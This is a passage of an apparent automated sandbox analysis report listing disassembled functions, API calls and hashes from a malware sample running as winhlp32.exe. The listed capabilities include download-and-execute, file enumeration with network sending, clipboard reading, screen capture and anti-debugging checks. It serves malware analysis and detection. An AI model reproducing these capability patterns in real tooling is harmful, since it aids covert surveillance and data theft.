                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                    • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Windows\winhlp32.exe$open
                                    • API String ID: 2825088817-987339790
                                    • Opcode ID: 0c32b853da7b836ab57f0bde1af97ed3e1694aa48b330bda9084993edcb846bb
                                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                    • Opcode Fuzzy Hash: 0c32b853da7b836ab57f0bde1af97ed3e1694aa48b330bda9084993edcb846bb
                                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: e29027b1129f5de26fe31c102a0591a663b67a3d85defad3f43bd9c530b36695
                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                    • Opcode Fuzzy Hash: e29027b1129f5de26fe31c102a0591a663b67a3d85defad3f43bd9c530b36695
                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                    • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                    • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                    • CloseClipboard.USER32 ref: 0040B725
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                    • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                    • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                    • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                    • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: lJD
                                    • API String ID: 1084509184-3316369744
                                    • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                    • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: lJD
                                    • API String ID: 1084509184-3316369744
                                    • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                    • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                    • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                    • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
